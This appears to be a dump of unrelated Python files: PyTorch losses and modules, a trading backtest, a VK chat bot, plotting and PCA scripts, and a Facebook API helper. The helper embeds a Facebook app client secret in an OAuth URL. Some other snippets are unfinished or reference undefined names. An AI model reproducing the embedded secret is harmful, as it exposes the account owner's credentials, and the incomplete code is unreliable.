x):\n\n x_all = []\n x_temp = []\n\n for num_in in range(len(self.in_channels)):\n x_all.append([x[seq][num_in] for seq in range(self.gating_seq_len)])\n\n for feat, conv_gating, sigmoid, conv, relu in zip(x_all, self.conv_gating, self.sigmoid, self.conv, self.relu):\n \n feat_cat = torch.cat(feat, 1)\n gating_weight = sigmoid(conv_gating(feat_cat))\n feat_gating = [feat[i] * gating_weight[:,i,:,:].unsqueeze(1) \\\n for i in range(len(feat))]\n\n feat_temp = torch.cat(feat_gating, 1)\n feat_temp = relu(conv(feat_temp))\n x_temp.append(feat_temp)\n\n return x_temp\n","sub_path":"mmdet/models/pixel/gating_seq.py","file_name":"gating_seq.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"542052285","text":"import urllib2\n\nfrom main.models import *\nimport main.facebook as fb\n\ndef get_name(at):\n if not at: return \"\"\n g = fb.GraphAPI(access_token = at )\n me = g.get_object('me')\n return me['first_name'] + ' ' + me['last_name']\n\ndef put_wall(at, msg):\n if not at: return None\n g = fb.GraphAPI(access_token = at)\n g.put_object(\"me\", \"feed\",\n message=msg,\n name= 'VerifyY',\n picture= 'http://myfriendfactory.appspot.com/static/images/wall.png',\n link= 'http://www.verifyy.com',\n actions= [\n {\n \"name\": \"View Experiment\",\n \"link\": \"http://www.verifyy.com/\"\n }])\n\n\n\ndef get_token_from_code(code):\n r = urllib2.urlopen(\"https://graph.facebook.com/oauth/access_token?client_id=205425319498174&redirect_uri=http://localhost:8000/&client_secret=1a5aa67a3a7f8bbe40422a8d01445e82&code=%s\" % code).read()\n return r.split('=')[1]\n\ndef get_auth_token(request):\n res = FBAuthCode.objects.filter(user=request.user)\n if not res: return None\n code = res[0].code\n return get_token_from_code(code)\n\ndef get_cached_token(request):\n authed = not isinstance(request.user,AnonymousUser)\n if not authed: return None\n res = list(FBAuthToken.objects.filter(user=request.user))\n if not res: return None\n return res[-1].token\n\ndef get_profile(token):\n g = fb.GraphAPI(access_token = token)\n return g.get_object(\"me\")\n\ndef save_code(user, code):\n at = get_token_from_code(code)\n fba = FBAuthCode(code=code, user=user)\n fba.save()\n \n","sub_path":"main/fb.py","file_name":"fb.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"314128815","text":"import datetime\nimport pandas as pd\nimport numpy as np\nimport quandl\nfrom abc import ABCMeta, abstractmethod\n\n\nclass MovingAverageXStrategy():\n\tdef __init__(self,symbol,bars,short_window,long_window):\n\t\tself.symbol=symbol\n\t\tself.bars = bars\n\t\tself.short_window=short_window\n\t\tself.long_window=long_window\n\n\tdef generate_signals(self):\n\t\tsignals=pd.DataFrame(index=self.bars.index)\n\t\tsignals['signal']=0\n\n\t\tsignals['short_mavg']=pd.rolling_mean(self.bars['Close'],self.short_window, min_periods=1)\n\t\tsignals['long_mavg']=pd.rolling_mean(self.bars['Close'],self.long_window,min_periods=1)\n\n\t\tsignals['signal'][self.short_window:] = np.where(signals['short_mavg'][self.short_window:] > signals['long_mavg'][self.short_window:],1,0)\n\t\tsignals['positions'] = signals['signal'].diff()\n\t\tself.signals=signals\n\n\t\treturn signals\t\n\nclass PostEarningsDriftStrategy():\n\tdef __init__(self,symbol,bars,window):\n\t\tself.symbol=symbol\n\t\tself.bars = bars\n\t\tself.window=window\n\tdef generate_signals(self):\n\n\t\treturn signals\n\nclass MarketonClosePortfolio(object):\n\tdef __init__(self,symbol,bars,signals,initial_capital):\n\t\t\tself.symbol=symbol\n\t\t\tself.bars=bars\n\t\t\tself.signals=signals\n\t\t\tself.initial_capital=initial_capital\n\n\tdef generate_positions(self):\n\t\tpositions = pd.DataFrame(index=self.signals.index).fillna(0.0)\n\t\tpositions[self.symbol]=100*self.signals['signal']\n\t\tself.positions=positions\n\t\treturn positions\n\n\tdef backtest_portfolio(self):\n\t\t\n\n\t\tportfolio = self.positions[self.symbol] * self.bars['Close']\n\t\tpos_diff= self.positions[self.symbol].diff()\n\n\t\tportfolio['holdings']=(self.positions*self.bars['Close'])\n\t\tportfolio['cash']=self.initial_capital - (pos_diff*self.bars['Close']).cumsum()\n\n\t\tportfolio['total']=portfolio['cash']+portfolio['holdings']\n\t\tportfolio['returns']=portfolio['total'].pct_change()\n\t\treturn portfolio\n\n\nif __name__=='__main__':\n\tsymbol = 'ORCL'\n\tbars= pd.read_csv('orcl-2000.csv')\n\n\tmac=MovingAverageXStrategy(symbol,bars,short_window=40,long_window=100)\n\tsignals=mac.generate_signals()\n\n\tportfolio=MarketOnClosePortfolio(symbol,bars,signals,initial_capital=100000.0)\n\treturns = portfolio.backtest_portfolio()\n\n","sub_path":"ma.py","file_name":"ma.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249359971","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# import ipdb\nimport time\n\n\n# Clustering penalties\nclass ClusterLoss(torch.nn.Module):\n \"\"\"\n Cluster loss is comes from the SuBiC paper and consists of two losses.\n First is the Mean Entropy Loss which makes the output to be close to one-hot encoded\n vectors.\n Second is the Batch Entropy Loss which ensures a uniform distribution o activations over the\n output (Uniform block support). \n \"\"\"\n def __init__(self):\n super(ClusterLoss, self).__init__()\n def entropy(self, logits):\n return -1.0*(F.softmax(logits,dim=0)*F.log_softmax(logits,dim=0)).sum()\n def forward(self, logits):\n \"\"\"\n Input: block_feats -> T x K # Where K is the number of classes and T is the batch size\n Output: L = MEL, BEL\n \"\"\"\n #Mean Entropy Loss - For one-hotness\n # L1 = Sum_batch_i(Sum_block_m(Entropy(block_i_m)))/TM\n sum1 = torch.zeros([logits.shape[0],1])\n for t in range(logits.shape[0]):\n sum1[t] = self.entropy(logits[t,:])\n L1 = torch.mean(sum1)\n\n #Batch Entropy Loss - For uniform support\n # L2 = -Sum_block_m(Entropy(Sum_batch_i(block_i_m)/T))/M\n mean_output = torch.mean(logits,dim=0)\n L2 = -1.0*self.entropy(mean_output)\n\n return L1.cuda(), L2.cuda()\n\n\n# Stochastic Transformation Stability Loss. Introduced in: \n# \"Regularization With Stochastic Transformations and Perturbations for Deep Semi-Supervised\n# Learning\"\nclass StochasticTransformationLoss(torch.nn.Module):\n \"\"\"\n The idea behind this is that stochastic transformations of an image (flips and translations)\n should lead to very close features.\n \"\"\"\n def __init__(self):\n super(StochasticTransformationLoss, self).__init__()\n def forward(self, features, num_transformations):\n \"\"\"\n Input: features -> T x D # Where D is the feature dimension and T is the batch size\n num_transformations -> Number of transformations applied to the data\n Make sure that T is a multiple of num_transformations\n Output: ST Loss \n \"\"\"\n batch_size = features.shape[0]\n split_features = torch.zeros([num_transformations, batch_size/num_transformations,\n features.shape[1]])\n for i in range(num_transformations):\n indices = torch.Tensor(range(i, batch_size, num_transformations)) # Has to be a longtensor\n split_features[i,:,:] = torch.index_select(feature, 0, indices)\n\n \n\n\n\ndef get_loss(loss_name ='CE'):\n if loss_name == 'CE':\n # ignore_index ignores the samples which have label -1000. We specify the unsupervised images by label -1000\n criterion = nn.CrossEntropyLoss(ignore_index=-1000).cuda()\n elif loss_name == 'ClusterLoss':\n criterion = ClusterLoss().cuda()\n elif loss_name == 'LocalityLoss':\n criterion = LocalityLoss().cuda()\n elif loss_name == 'CAMLocalityLoss':\n criterion = CAMLocalityLoss().cuda()\n elif loss_name == 'LEL':\n criterion = LocalityEntropyLoss().cuda()\n\n return criterion\n","sub_path":"CIFAR10/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"629663199","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2019 Kyoto University (Hirofumi Inaguma)\n# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)\n\n\"\"\"Utility functions for evaluation.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport torch\n\nlogger = logging.getLogger(__name__)\n\n\ndef average_checkpoints(model, best_model_path, epoch, n_average):\n if n_average == 1:\n return model\n\n n_models = 1\n state_dict_ave = model.state_dict()\n for i in range(epoch - 1, 0, -1):\n if n_models == n_average:\n break\n checkpoint_path = best_model_path.replace('-' + str(epoch), '-' + str(i))\n if os.path.isfile(checkpoint_path):\n logger.info(\"=> Loading checkpoint (epoch:%d): %s\" % (i, checkpoint_path))\n params = torch.load(checkpoint_path,\n map_location=lambda storage, loc: storage)['state_dict']\n for k, v in params.items():\n state_dict_ave[k] += v\n n_models += 1\n\n # take an average\n logger.info('Take average for %d models' % n_models)\n for k, v in state_dict_ave.items():\n state_dict_ave[k] /= n_models\n model.load_state_dict(state_dict_ave)\n\n avrage_checkpoint_path = best_model_path.replace('-' + str(epoch), '-avg' + str(n_average))\n torch.save(model, avrage_checkpoint_path)\n\n return model\n","sub_path":"neural_sp/bin/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617991685","text":"# -*- coding: UTF-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom matplotlib.pyplot import MultipleLocator\nimport numpy\nimport contract\nimport datetime\n\ndef main():\n month1 = input(\"please input month1 01 ~ 12: \");\n month2 = input(\"please input month2 01 ~ 12: \");\n\n cs = [\n [\"ma14\",\"gray\"],\n [\"ma15\",\"pink\"],\n [\"ma16\",\"green\"],\n [\"ma17\",\"brown\"],\n [\"ma18\",\"blue\"],\n [\"ma19\",\"red\"],\n [\"ma20\",\"black\"]\n ]\n\n l = []\n name_list = []\n for i, val in enumerate(cs):\n a = val[0] + month1\n b = val[0] + month2\n if month2 < month1:\n if i >= len(cs)-1:\n continue\n b = cs[i+1][0]+month2\n l.append([a,b,a+\" - \"+b])\n name_list.append(a)\n name_list.append(b)\n \n datas = contract.load()\n m = contract.filter1(datas,name_list,False)\n\n ax = plt.gca()\n #指定X轴的以日期格式(带小时)显示\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%m-%d'))\n #X轴的间隔为小时\n ax.xaxis.set_major_locator(mdates.MonthLocator())\n \n y_major_locator=MultipleLocator(100)\n ax.yaxis.set_major_locator(y_major_locator)\n\n diff_l = []\n for pair in l:\n diff_x = []\n diff_y = []\n if pair[0] not in m or pair[1] not in m:\n continue\n ma = m[pair[0]]\n mb = m[pair[1]]\n year = int(\"20\"+pair[0][2:4])\n for (date,v) in ma.items():\n if date not in mb:\n continue\n diff_y.append(v - mb[date])\n print(2019 + date.year - year,date.month,date.day)\n diff_x.append(datetime.date(2019 + date.year - year,date.month,date.day))\n \n\n diff_l.append([pair[2],diff_x,diff_y])\n \n plt.xlabel(\"ma price diff \" + month1 + \" \" + month2)\n plt.ylabel(\"\")\n ls = []\n labels = []\n for i,v in enumerate(diff_l):\n plt.plot(v[1],v[2],color=cs[i][1],linestyle='-',linewidth = 1,label=v[0])\n labels.append(v[0])\n \n plt.legend(labels = labels,loc = 'best',shadow = True)\n plt.grid(axis=\"y\",linestyle=\"--\")\n plt.show()\n\nmain()","sub_path":"sp/price_diff.py","file_name":"price_diff.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277021488","text":"import pandas as pd\nfrom pandas import DataFrame\nimport random\nfrom xlwt import Workbook\n\n\n# 创建目标表\ndef build_xlsx(num):\n # 创建文件以存储480个样本\n book = Workbook(encoding='utf-8')\n sheet1 = book.add_sheet('Sheet 1')\n sheet1.write(0, 0, \"id\")\n sheet1.write(0, 1, \"image_id\")\n for i in range(30):\n sheet1.write(i + 1, 0, i)\n # 保存Excel book.save('path/文件名称.xls')\n book.save('task_img_id'+str(num)+'.xls')\n\n\n# 挑选30张图像进行调度,用随机函数从300张图像中挑选30张\ndef get_random_samples(num, g):\n result = pd.read_excel('task_img_id'+str(g)+'.xls')\n ran = []\n # 在300份图像数据中随机选取30份图像\n p = 0\n while p < 30:\n temp = int(random.random() * 300)\n if temp in ran:\n continue\n else:\n ran.append(temp)\n result['image_id'][p] = temp\n DataFrame(result).to_excel('task_img_id'+str(g)+'.xls')\n print(p, temp)\n p += 1\n\n\nif __name__ == '__main__':\n num = 30\n for i in range(10):\n build_xlsx(i)\n get_random_samples(num, i)\n","sub_path":"src/DNN&RF/get_taskId_byRandom.py","file_name":"get_taskId_byRandom.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"550194788","text":"from matplotlib import pyplot as plt\n# %matplotlib inline\n\nApl_price = [4,5,1]\nYear = [1,2,3]\n\nplt.plot(Year,Apl_price)\n\nplt.title('Stats')\nplt.xlabel('Year')\nplt.ylabel('Apl_price')\nplt.show()","sub_path":"Graph_mataplot.py","file_name":"Graph_mataplot.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"228439863","text":"import numpy as np\n\ndata=[1,2,3,4]\nnum_validation_samples=10000\n\n# 通常需要打乱数据\nnp.random.shuffle(data)\n\n# 定义验证集\nvalidation_data=data[:num_validation_samples]\ndata=data[num_validation_samples:]\n\n# 定义训练集\ntraining_data=data[:]\n\n# 在训练集上训练模型,并在验证数据上评估模型\nmodel=get_model()\nmodel.train(training_data)\nvalidation_score=model.evaluate(validation_data)\n\n# 现在你可以调节模型、重新训练、评估,然后再次调节\n\n\n# 一旦调节好超参数,通常就在所有非测试数据上从头开始训练最终模型\nmodel=get_model()\nmodel.train(np.concatenate([training_data,validation_data]))\ntest_socre=model.evaluate(test_data)","sub_path":"DeepLearingwithPython/Listing4-1.py","file_name":"Listing4-1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473488836","text":"from core.emotion.emotion3 import emojis, get_emotion, emotion_validation\nfrom core.emotion.emotion2 import get_mfcc, dtw, distance, match\nfrom core.emotion.emotion1 import *\nimport numpy\nimport cv2\nimport PIL\nimport os\n\ndef detect_emotion(emotion, debug=False):\n emoji_path=''\n print('parameter: {0}'.format(emotion))\n emotion = emotion.lower()\n if(emotion==\"happy\"):\n emoji_path = emojis.happy\n pic_name = get_emotion(emoji_path, debug, 10)\n elif(emotion==\"surprise\"):\n emoji_path = emojis.surprise\n pic_name = get_emotion(emoji_path, debug, 100)\n elif(emotion==\"angry\"):\n emotion = \"angry\"\n elif(emotion==\"disgust\"):\n emotion = \"disgust\"\n elif (emotion == \"sad\"):\n emotion = \"sad\"\n elif (emotion == \"fear\"):\n emotion = \"fear\"\n elif (emotion == \"weak sad\"):\n emotion = \"weak sad\"\n elif (emotion == \"mid sad\"):\n emotion = \"mid sad\"\n elif (emotion == \"very sad\"):\n emotion = \"very sad\"\n elif (emotion == \"weak fear\"):\n emotion = \"weak fear\"\n elif (emotion == \"mid fear\"):\n emotion = \"mid fear\"\n elif (emotion == \"very fear\"):\n emotion = \"very fear\"\n else:\n emotion = \"other\"\n emoji_path = emojis.other\n pic_name = get_emotion(emoji_path, debug, 100)\n \n return emotion, emoji_path\n\ndef process_speech(voice_path):\n emotion_result = []\n\n #Add group 1 method here to get a return result with proper array\n emotion_result.append(\"Other\")\n\n #Add group 2 method here to get a return result with proper array\n # emotion_result.append(\"Other\")\n emotion_result.append(match(voice_path))\n\n #group 3 result\n emotion_result.append(emotion_validation(voice_path))\n #emotion_result.append(\"happy\")\n return emotion_result\n\n","sub_path":"ai_engine/workflow/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366669889","text":"# 10 May 2017 13:27:48\n\nimport matplotlib.pyplot as plt\nfrom prob2d import get_prob2d\nfrom read_mock import read_mock\nimport numpy as np\n\n\ndef show_halomass_distribution():\n p2d_arr, lnMs_arr, lnMh_arr = get_prob2d(sigma_lnMs=0.49730, hmfdata=\"../data/hmf.dat\")\n # Integrate over p(lnMs, lnMh) to get p(lnMs)\n p_lnMs_arr = np.trapz(p2d_arr, x=lnMh_arr, axis=-1)\n # Derive p(lnMh|lnMs) = p(lnMh,lnMs) / p(lnMs)\n p_lnMh_at_lnMs = np.zeros(p2d_arr.shape)\n # Divide p2d_arr by p_lnMs_arr at fixed Ms\n for i in xrange(lnMs_arr.size):\n lgMs = lnMs_arr[i] / np.log(10.0)\n p_lnMh_at_lnMs[i, :] = p2d_arr[i, :] / p_lnMs_arr[i]\n # check normalization\n # print np.trapz(p_lnMh_at_lnMs[i, :], x=lnMh_arr)\n # Plot the distribution of halo mass at a few fixed stellar masses\n if np.mod(i, 15) == 0 and lgMs < 12 and lgMs > 9.5:\n plt.plot(lnMh_arr / np.log(10.0), p_lnMh_at_lnMs[i, :],\n label=r\"$\\lg\\;M_*=$\" + format(lgMs, '4.2f'))\n plt.legend(loc=1)\n plt.ylim(1e-2, 1e1)\n plt.xlim(11, 16)\n plt.ylabel(r\"$p(\\ln\\,M_h)$\")\n plt.xlabel(r\"$\\lg\\,M_h$\")\n plt.yscale('log')\n plt.show()\n\n\ndef get_halomass():\n # those are the same as in 'show_halomass_distribution', see comments above\n p2d_arr, lnMs_arr, lnMh_arr = get_prob2d(sigma_lnMs=0.49730, hmfdata=\"../data/hmf.dat\")\n p_lnMs_arr = np.trapz(p2d_arr, x=lnMh_arr, axis=-1)\n # you can use the following loop to get p_lnMh_at_lnMs\n #\n # p_lnMh_at_lnMs = np.zeros(p2d_arr.shape)\n # for i in xrange(lnMs_arr.size):\n # p_lnMh_at_lnMs[i, :] = p2d_arr[i, :] / p_lnMs_arr[i]\n #\n # or try the one-line code below (.T means 'transpose')\n p_lnMh_at_lnMs = (p2d_arr.T / p_lnMs_arr).T\n # now let's get the mean lnMh at fixed Ms\n lnMh_mean_arr = np.zeros(lnMs_arr.size)\n for i in xrange(lnMs_arr.size):\n if True:\n # check the normalization\n _norm = np.trapz(p_lnMh_at_lnMs[i, :], x=lnMh_arr)\n if np.abs(_norm - 1.0) > 1e-5:\n raise RuntimeError('normalization breaks')\n lnMh_mean_arr[i] = np.trapz(p_lnMh_at_lnMs[i, :] * lnMh_arr, x=lnMh_arr)\n # convert results to log-10 base\n lgMs_arr = lnMs_arr / np.log(10.0)\n lgMh_mean_arr = lnMh_mean_arr / np.log(10.0)\n # convert halo mass units from Msun to Msun/h to compare with the values in the mock data\n lgMh_mean_arr = lgMh_mean_arr + np.log10(0.7)\n return(lgMs_arr, lgMh_mean_arr)\n\ndef compare_halomass_with_mock(mockfile):\n # show_halomass_distribution()\n lgMs_arr, lgMh_mean_arr = get_halomass()\n plt.plot(lgMs_arr, lgMh_mean_arr, 'r-', label=\"Prediction\")\n #\n galrec = read_mock(mockfile)\n iscen = galrec['lg_halo_mass'] > 1\n lgmh = galrec['lg_halo_mass'][iscen]\n lgms = galrec['lg_stellar_mass'][iscen]\n lgms_bins = np.linspace(10.0, 11.5, 15)\n lgms_cens = (lgms_bins[1:] + lgms_bins[:-1]) * 0.5\n lgmh_cens = np.zeros_like(lgms_cens)\n lgmh_errs = np.zeros_like(lgms_cens)\n for i in xrange(lgms_cens.size):\n sel = (lgms >= lgms_bins[i]) & (lgms < lgms_bins[i+1])\n nsel = np.sum(sel)\n if nsel > 5:\n # update lgms_cens\n lgms_cens[i] = np.mean(lgms[sel])\n lgmh_cens[i] = np.mean(lgmh[sel])\n lgmh_errs[i] = np.std(lgmh[sel]) / np.sqrt(float(nsel))\n plt.errorbar(lgms_cens, lgmh_cens, yerr=lgmh_errs, color=\"k\", marker=\"o\", ms=5, label=\"Mock Data\")\n plt.legend(loc=2)\n plt.xlabel(r\"$M_*\\;[M_\\odot/h^2]$\")\n plt.ylabel(r\"$M_h\\;[M_\\odot/h]$\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n mockfile = '/Users/ying/Data/ihodmock/standard/iHODcatalog_bolshoi.h5'\n show_halomass_distribution()\n compare_halomass_with_mock(mockfile)\n","sub_path":"session_2/halomass.py","file_name":"halomass.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307694550","text":"# coding: utf-8\nimport future.utils\nimport six\n\nfrom modernrpc.conf import settings\n\n\ndef _generic_convert_string(v, from_type, to_type, encoding):\n \"\"\"\n Generic method to convert any argument type (string type, list, set, tuple, dict) to an equivalent,\n with string values converted to given 'to_type' (str or unicode).\n This method must be used with Python 2 interpreter only.\n\n :param v: The value to convert\n :param from_type: The original string type to convert\n :param to_type: The target string type to convert to\n :param encoding: When\n :return:\n \"\"\"\n assert future.utils.PY2, \"This function should be used with Python 2 only\"\n assert from_type != to_type\n\n if from_type == six.binary_type and isinstance(v, six.binary_type):\n return six.text_type(v, encoding)\n\n elif from_type == six.text_type and isinstance(v, six.text_type):\n return v.encode(encoding)\n\n elif isinstance(v, (list, tuple, set)):\n return type(v)([_generic_convert_string(element, from_type, to_type, encoding) for element in v])\n\n elif isinstance(v, dict):\n return {k: _generic_convert_string(v, from_type, to_type, encoding) for k, v in v.items()}\n\n return v\n\n\ndef standardize_strings(arg, strtype=settings.MODERNRPC_PY2_STR_TYPE, encoding=settings.MODERNRPC_PY2_STR_ENCODING):\n \"\"\"\n Python 2 only. Lookup given *arg* and convert its str or unicode value according to MODERNRPC_PY2_STR_TYPE and\n MODERNRPC_PY2_STR_ENCODING settings.\n \"\"\"\n assert future.utils.PY2, \"This function should be used with Python 2 only\"\n\n if not strtype:\n return arg\n\n if strtype == six.binary_type or strtype == 'str':\n # We want to convert from unicode to str\n return _generic_convert_string(arg, six.text_type, six.binary_type, encoding)\n\n elif strtype == six.text_type or strtype == 'unicode':\n # We want to convert from str to unicode\n return _generic_convert_string(arg, six.binary_type, six.text_type, encoding)\n\n raise TypeError('standardize_strings() called with an invalid strtype: \"{}\". Allowed values: str or unicode'\n .format(repr(strtype)))\n","sub_path":"modernrpc/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"34302758","text":"\n\nfrom xai.brain.wordbase.nouns._eardrum import _EARDRUM\n\n#calss header\nclass _EARDRUMS(_EARDRUM, ):\n\tdef __init__(self,): \n\t\t_EARDRUM.__init__(self)\n\t\tself.name = \"EARDRUMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"eardrum\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_eardrums.py","file_name":"_eardrums.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"621489232","text":"import requests\nimport json\n\n# Make an API call and store the response\nurl = 'https://hacker-news.firebaseio.com/v0/item/23593872.json'\nr = requests.get(url)\nprint(r.status_code)\n\n# Explore the structure of the data\nfilepath = 'Data visualization\\\\data\\\\hn_article.json'\nresponse_dict = r.json()\nwith open(filepath, 'w') as f:\n json.dump(response_dict, f, indent=4)\n","sub_path":"Data visualization/Chapter 3/hn_article.py","file_name":"hn_article.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637796379","text":"from config import *\n\nimport vk_api\nimport requests\nimport random\n\n\nvk_bot = vk_api.VkApi(token=TOKEN)\nlong_poll = vk_bot.method('messages.getLongPollServer', {'need_pts': 1, 'lp_version': 3})\nserver, key, ts = long_poll['server'], long_poll['key'], long_poll['ts']\n\nvk_bot_user = vk_api.VkApi(token=ACCOUNT_TOKEN) # wall.get for user only\n\n\nprint(\"Ready to work\")\nprint(str(long_poll))\n\nurl_trans = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\ndef YaTrans(in_text, lang):\n trans_option = {'key':YA_KEY, 'lang':lang, 'text': in_text}\n webRequest = requests.get(url_trans, params = trans_option)\n out_text = webRequest.text\n out_text = out_text[36:(len(out_text)-3)]\n print(out_text)\n return out_text\n\t\n\ndef write_msg(user_id, text):\n vk_bot.method('messages.send', {'user_id': user_id, 'message': text, 'random_id': random.randint(0, 1000)})\n\n\ndef sprosit_zadanie(urok):\n write_msg(user_id, 'Привет, ' + (user_name[0]['first_name']) + ', что задано по ' + urok)\n\n\ndef write_msg_attach(user_id, text, att_url):\n vk_bot.method('messages.send',\n {'user_id': user_id,\n 'attachment': att_url,\n 'message': text,\n 'random_id': random.randint(0, 1000)})\n\ndef get_last_post(owner_id, count, offset, filter): # wall.get\n\tresponse = vk_bot_user.method('wall.get',\n\t\t{'owner_id': owner_id,\n\t\t'count': count,\n\t\t'offset': offset,\n\t\t'filter': filter})\n\treturn response['items'][0]['id'] # return id of post\n\t\t\t\t \n\t\t\t\t \nwhile True:\n long_poll = requests.get(\n 'https://{server}?act={act}&key={key}&ts={ts}&wait=2500'.format(server=server, act='a_check', key=key,\n ts=ts)).json()\n\n update = long_poll['updates']\n if update[0][0] == 4:\n print(update)\n user_id = update[0][3]\n user_name = vk_bot.method('users.get', {'user_ids': user_id})\n if 'Вероника' in (user_name[0]['first_name']):\n write_msg(user_id, 'Привет, ' + (user_name[0]['first_name']) + ', что задано по математике?')\n elif 'Сергей' in (user_name[0]['first_name']):\n sprosit_zadanie('физике')\n elif 'Иван' in (user_name[0]['first_name']):\n sprosit_zadanie('химии')\n\n if 'en:' in update[0][6]:\n na_perevod = str(update[0][6])\n na_perevod = na_perevod[3:(len(na_perevod))]\n perevod = YaTrans(na_perevod, 'en-ru')\n write_msg(user_id, perevod) # message to user\n elif 'ru:' in update[0][6]:\n na_perevod = str(update[0][6])\n na_perevod = na_perevod[3:(len(na_perevod))]\n perevod = YaTrans(na_perevod, 'ru-en')\n write_msg(user_id, perevod) # message to user\n elif 'красив' in update[0][6]: # search for 'красив'\n group_id = -35684707 # group id always starts from minus\n post_id = get_last_post(group_id, 1, 1, 'owner')\n attach = 'wall' + str(group_id) + ' ' + str(post_id) # make link to post\n write_msg_attach(user_id, 'вот тебе красота', attach)\n elif 'картинк' in update[0][6]:\n write_msg_attach(user_id,\n 'вот тебе огненная картинка',\n 'photo-171720905_456232035')\n elif 'Что задано' in update[0][6]:\n write_msg(user_id,\n 'Извини, но я не знаю, что задано')\n else:\n write_msg(user_id, 'Привет, ' + (user_name[0]['first_name'])) # message to user\n\n print(str(user_name[0]['first_name']) + ' ' +\n str(user_name[0]['last_name']) + ' has written to bot - ' +\n str(update[0][6])) # msg to us\n\n ts = long_poll['ts']\n\n","sub_path":"run_bot_vk.py","file_name":"run_bot_vk.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"351068365","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mnist import MNIST\nimport time\n\n\nnp.random.seed(0)\n\n\ndef load_mnist_dataset(path=\"data/mnist_data/\"):\n \"\"\"Loads MNIST data located at path.\n\n MNIST data are 28x28 pixel large images of numbers.\n\n Parameters\n ----------\n path : `str`\n path to the data directory\n\n Returns\n -------\n train : `torch.tensor`\n train data normalized to 1\n trainlabels : `torch.tensor`\n train data labels\n test : `torch.tensor`\n test data normalized to 1\n testLabels : `torch.tensor`\n test data labels\n \"\"\"\n mndata = MNIST(path)\n\n train, trainLabels = map(np.array, mndata.load_training())\n test, testLabels = map(np.array, mndata.load_testing())\n\n train = train/255.0\n test = test/255.0\n\n return train, trainLabels, test, testLabels\n\n\ndef calculate_errors(x, eigenvectors=None, transMatrix=None):\n \"\"\"Calculates mean square error of PCA prediction.\n\n Paramters\n ---------\n x: `np.array`\n Features\n Vk: `np.array`, optional\n Eigenvectors\n transMatrix: `np.array`, None\n Transformation matrix, the dot product of eigenvectors with themselves\n trainsposed.\n\n Returns\n -------\n error: `float`\n Means square error of reconstruction.\n \"\"\"\n if transMatrix is None:\n if eigenvectors is None:\n raise AttributeError(\"Need to supply Vk!\")\n transMatrix = np.dot(eigenvectors, eigenvectors.T)\n return np.mean((x - np.dot(x, transMatrix))**2)\n\n\ndef plot_eigen_fraction(k, frac):\n \"\"\"Plots eingenvalue fraction as a function of the total number of\n eingenvectors found during decomposition.\n\n Parameters\n ----------\n k: `int`\n Number of fitted eigenvectors\n frac: `float`\n Fraction of eigenvalues over total eigenvalue sum.\n \"\"\"\n fig, ax = plt.subplots()\n ax.plot(k, frac)\n ax.set_xlabel(\"k\")\n ax.set_ylabel(\"Eingenvalue fraction\")\n ax.set_title(\"Eigenvalue fraction vs k\")\n plt.show()\n\n\ndef plot_errors(k, train, test):\n \"\"\"Plots test and train error as a function of the number of eigenvectors\n used in reconstruction.\n\n Parameters\n ----------\n k: `int`\n Number of used eigenvectors\n test: `np.array`\n Test error\n train: `np.array`\n Train error\n \"\"\"\n fig, ax = plt.subplots()\n ax.plot(k, test, label=\"Test error\")\n ax.plot(k, train, label=\"Train error\")\n ax.set_xlabel(\"k\")\n ax.set_ylabel(\"Mean squared reconstruction error\")\n ax.set_title(\"MSE vs k.\")\n ax.legend()\n plt.show()\n\n\ndef plot_n_eigenvectors(n, eigenvectors, nXaxes=2, nYaxes=5):\n \"\"\"Plots first n eigenvectors\n\n Parameters\n ---------\n n: `int`\n Number of vectors to plot\n eigenvectors: `np.array`\n Eigenvectors\n 